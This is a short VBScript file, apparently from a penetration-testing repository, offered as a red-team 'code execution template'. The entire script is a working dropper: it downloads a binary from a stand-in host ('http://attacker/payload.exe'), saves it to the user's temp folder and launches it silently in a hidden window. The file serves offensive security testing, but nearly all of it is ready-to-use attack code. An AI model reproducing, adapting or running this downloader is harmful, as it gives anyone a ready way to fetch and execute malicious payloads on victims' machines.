mgeeky-Penetration-Testing-.../red-teaming/code-exec-templates/download-file-and-exec.vbs

36 lines
858 B
Plaintext

'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
sh.Run cmd, 0, False
End If
Set sh = Nothing
Set xhr = Nothing